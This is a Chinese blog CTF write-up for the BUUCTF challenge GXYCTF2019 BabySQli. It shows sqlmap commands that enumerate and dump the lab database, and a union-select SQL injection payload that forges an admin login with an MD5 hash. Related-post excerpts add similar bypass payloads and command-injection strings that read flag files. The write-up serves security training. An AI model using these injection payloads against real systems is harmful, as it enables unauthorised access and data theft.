BUUCTF:[GXYCTF2019]BabySQli

最新推荐文章于 2024-06-15 18:38:29 发布
原创 最新推荐文章于 2024-06-15 18:38:29 发布 · 464 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全

文章详细描述了如何通过sqlmap工具对一个可能存在时间盲注的登录框进行测试和利用,包括抓包、扫描数据库、爆破表名和字段,以及处理MD5碰撞的过程。

打开靶机
在这里插入图片描述
是一个登录框。右键看一下源码。
在这里插入图片描述
可以看到是以post方法传参。感觉像时间盲注。随便输入一个用户名和密码,然后bp抓包。
在这里插入图片描述
我们把这个页面全部复制,创建一个txt文件粘贴进去。

在这里插入图片描述
把这个文件托进kali里然后打开终端,用sqlmap扫描数据库。
命令:sqlmap -r /home/wz/桌面/2.txt --dbs
这个文件路径就输入你的路径。然后一路点y。
请添加图片描述
可以看到数据库为:information_schema和web_sqli。根据经验我们应该爆破第二个。命令为:

sqlmap -r /home/wz/桌面/2.txt -D web_sqli --tables

请添加图片描述
可以看到爆出的表名为:user。我们爆字段。
命令为:sqlmap -r /home/wz/桌面/2.txt -D web_sqli -T user --columns

在这里插入图片描述
然后我们爆数据。命令为:sqlmap -r /home/wz/桌面/2.txt -D web_sqli -T user -C id,passwd,username --dump

在这里插入图片描述
然后你会发现这个md5碰撞不出来。我们还得构造。
mysql在查询不存在的数据时会自动构建虚拟数据,一般数据要么明文,要么MD5;所以我们去哈希一下123得202cb962ac59075b964b07152d234b70。
我们payload: name=1'union select 1,'admin','202cb962ac59075b964b07152d234b70'#&pw=123
最后放松一下眼睛。请添加图片描述

请添加图片描述
请添加图片描述
请添加图片描述
请添加图片描述
请添加图片描述

![请添加图片描述](https://img-blog.csdnimg.cn/2052feaaf2184bdea3ed14a9450

请添加图片描述

图片是抖音@瞳瞳

寡人略秀
关注
buuctf-BabySQli
m0_62094846的博客
03-25 361
POST传参,先随便传入几个值,用bp查看 尝试后发现or等很多都被过滤了,但是可以用select,判断字段数 说明有3个字段 , 源代码中有加密代码,看着这纯大写+数字,就猜是base32,用base32解密,再用base64解密可以得到 这是sql查询语句,说明主要的查询对象是name而不是pw 看别人的wp,name是admin 之前是wrong user现在变成wrong pass 说明user是正确的 把它带入查询语句 发现只有admin在...
BUUCTF [web专项30][GXYCTF2019]BabySQli
yanglinchiji的博客
11-07 215
我的思路是去用union select查询列数,然后尝试username在哪个列,然后再注入临时用户数据。mysql在查询不存在的数据时会自动构建虚拟数据,一般数据要么明文,要么MD5。发现这是一句用来查询 我们提交的用户名的数据(应该没什么操作空间)可以使用union select来查询列数,那就再次增加列数来尝试。经过测试解码,解码顺序是:base32解码->base64解码。注意:这里的第三列用的是123进行md5转换后的数据,因为。双写绕过也错误,那就换个联合查询看看能不能查出来。
[GXYCTF2019]BabysqliV3.0
LYJ20010728的博客
05-19 1107
[GXYCTF2019]BabysqliV3.0考点思路Payload预期解法非预期解法 考点 弱口令、PHP反序列化 思路 ①:题目页面提示我们应该是需要sqli注入,但是用它输入框提示的admin/password一试就进去了… ②:http://5f8d9cd4-4695-4428-acc2-b02b0e49d8d9.node3.buuoj.cn/home.php?file=upload熟悉的形式,用php伪协议读取一下文件试试; ③:预期解法:审计 upload.php 代码,$this-&g
[GXYCTF 2019]BabySqli
m0_70819573的博客
03-23 632
2.此时可以利用sqli的特性,当查询一个不存在的表时会创建一个虚拟的表,且当查询原题源码时发现它会将pwMD5加密与库中数据比较,在sqli中,数据库密码一般以MD5加密或明文存放。过滤了(),database(),无法进行爆库,所以只能想是否存在admin用户,发现回显wrong pass.1.打开环境,显然是sql注入。
[GXYCTF2019]BabySQli
devilare的博客
05-18 565
[GXYCTF2019]BabySQli 刷题笔记 随便登录试试 好像是有admin这个用户名(一般都有QAQ),加入单引号,爆出错误,加入常规操作发现始终回显一样,看看源代码 MMZFM422K5HDASKDN5TVU3SKOZRFGQRRMMZFM6KJJBSG6WSYJJWESSCWPJNFQSTVLFLTC3CJIQYGOSTZKJ2VSVZRNRFHOPJ5 百度一下,会发现这个是base32+base64加密得到的,解密后得到select * from user whe...
buuctf [GXYCTF2019]BabySQli
SopRomeo的博客
03-05 6239
常规sql注入都行不通,查看源码发现一个search.php, 先说说base32 和 base64 的区别, base32 只有大写字母和数字数字组成,或者后面有三个等号。 base64 只有大写字母和数字,小写字母组成,后面一般是两个等号。 明显,那段文字是base32加密 解密后:c2VsZWN0ICogZnJvbSB1c2VyIHdoZXJlIHVzZXJuYW1lID0gJyRuYW...
buuctf-[GXYCTF2019]BabySQli WP(小宇特详解)
小宇的web博客
01-28 1353
buuctf-[GXYCTF2019]BabySQli WP(小宇特详解) 这里先看一下源码 查看search.php 这里先base32解码,然后在base64解码得到 select * from user where username = ‘$name’ 这里先尝试一下user是admin,然后password是123456,回显wrong pass 而尝试一下其他的user和其他密码发现这里回显的是wrong user 这个现象给了信息,说明admin的user是对的只是密码是错的 这里用联合查询u
BUUCTF刷题记录[GXYCTF2019]BabysqliV3.01——涉及phar反序列化pop链
u013119911的博客
06-30 1660
题目是Babysqli,具有一定误导性,会让做题者认为需要sql注入,实际上打开连接输入弱口令:即可进入 至此应该可以看出来是一个文件上传的题目,点击右键查看源代码,未发现有效信息, 在地址栏发现?file=upload,如果需要读取源码,从此处猜测应该是需要构造一个伪协议。从题目上来说,需要查看源码进行代码审计。 这里需要注意,查看upload.php源代码,后面的resource需要等于upload,不要加.php,程序会自动添加.php,......
Buuctf web题 [GXYCTF2019]BabySQli WP
alatan9的博客
02-09 272
账号1' union select 1,'admin','e10adc3949ba59abbe56e057f20f883e'尝试后发现select 1,2,3 1是账号 3是密码 2不知道是啥。发现一串密码由于多数的大写字母怀疑是base32 解密。我们可以利用union select来创建一个临时账号。需要工具的可以私聊我 技术问题也可以私聊。解密后发现是base64 再次解密。发现到4报错 说明数据库只有三列。应该是sql注入先爆破出账号。发现过滤order 尝试绕过。发现账号是admin。
BUUCTF[GXYCTF2019]BabySQli
firecjh的博客
06-15 660
筛选有用的代码,发现代码赋值$result时使用了mysqli_query()函数,这个函数用于执行某个针对数据库的查询并且规定只能查询字符串,证明了上面的猜测,从代码中可以发现$arr使用了mysqli_fetch_row函数,将所有返回结果作为枚举数组,所有返回结果又是从数据库中查询出来的,说明数组的值和数据库的值相同,那么查询数据库的值时也相当于在查数组的值,由于之前返回了联合查询时返回了wrong pass!发现成功返回flag。
buuctf BabySQli
qq_44111753的博客
01-02 1128
随便输入,发现一串密文,数字+大写字母,大概是采用base32加密 base32解密如下,有“=”,猜测是base64加密 base64解密如下 查询后台数据库username等于输入值得所有数据 后台数据库的登录逻辑大概是:将输入的用户名与后台数据库中的所有用户名做比较,找出相等的,然后用这组数据的密码与用户输入的密码作比较,若相等,则登录成功 重要点:放置于后台的数据库大概率是经过hash加密的 操作:在用户名框注入 1’ union select ‘admin’,加密后的密码 为了使登录成功,注入
buuctf babysqli
weixin_55567437的博客
07-15 178
从这条信息可以知道这是base32码,解码得到一个base64码 解码得到一个: select * from user where username = '".$name."' 不能得到有用的信息但通过题目源码得知password被md5加密了 所以得找个办法绕过加密。构建一个payload虚拟身份绕过审核机制。 通过burp suite 并构建一个name=1' union select 1,'admin','.......'#pw=123 '......'就是123的...
BUUCTFBabySQli[GXYCTF2019]
金 帛的博客
05-06 707
BUUCTF的WP
buuctf [GXYCTF2019]BabySQli
weixin_43152809的博客
10-14 1010
今日份习题 名字叫babysqli 主界面是一个登陆页面,看起来好像不难的亚子 开搞! 通过尝试发现or,=,()都被过滤了 输入的时候,一个是wrong user,一个是wrong pass,尝试抓了一下包 发现了一串奇怪的字符串,尝试base64加密,失败了,我以为出题人坑我呢。。。 好在在题目的主界面发现了一个GitHub的网址 进去后发现了题目的源码 主要点在这里: select * from user where username = '".$name."' password被md5加密
buuctf [GXYCTF2019]Ping Ping Ping
最新发布
03-28
### BUUCTF GXYCTF2019 Ping Ping Ping Writeup 解题思路 该题目属于命令执行绕过类题目,主要考察选手对于PHP代码中的输入验证机制以及Linux命令执行的理解。以下是详细的解题分析: #### 题目背景 通过提供的代码片段可以看出,程序接收用户提交的`ip`参数,并将其作为`shell_exec()`函数的一部分来调用`ping`命令[^4]。然而,在实际运行过程中,存在多层正则表达式过滤逻辑,用于防止恶意字符注入和敏感关键字(如`flag`)的出现。 #### 绕过方法解析 ##### 方法一:利用`${IFS}`替代空格 由于题目明确指出对空白字符进行了严格过滤,因此无法直接使用空格分隔命令参数。可以通过引入环境变量`${IFS}`(Internal Field Separator),它默认表示为空白符,从而完成命令拼接[^3]: ```bash /?ip=cat${IFS}/flag.php ``` ##### 方法二:内联执行与反引号组合 除了替换空格外,还可以借助Shell内置功能——内联执行(Backticks)。这种方式允许在一个命令内部嵌套另一个子命令的结果作为其一部分参与运算[^1]: ```bash /?ip=`cat flag.php` ``` ##### 方法三:变量拆分重组 当某些特定单词被整体屏蔽时(例如这里的“flag”),可以考虑将目标字符串分割成多个部分分别赋值给不同变量名,最后再动态组装起来形成最终路径[^2]: ```php /?ip=127.0.0.1;b=ag;a=fl;cat$IFS$a$b.php ``` 以上三种方案均能有效规避现有检测规则限制的同时达成预期效果即读取服务器上的文件内容。 #### 实际操作演示 假设我们已经找到了合适的payload,则可以直接访问对应URL地址获取FLAG信息。例如采用第二种方法的话请求形式如下所示: ```http GET /?ip=`cat%20flag.php` HTTP/1.1 Host: target-server.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Connection: close Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0 ``` 如果一切正常,响应数据中应该会包含我们需要的目标文件具体内容。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值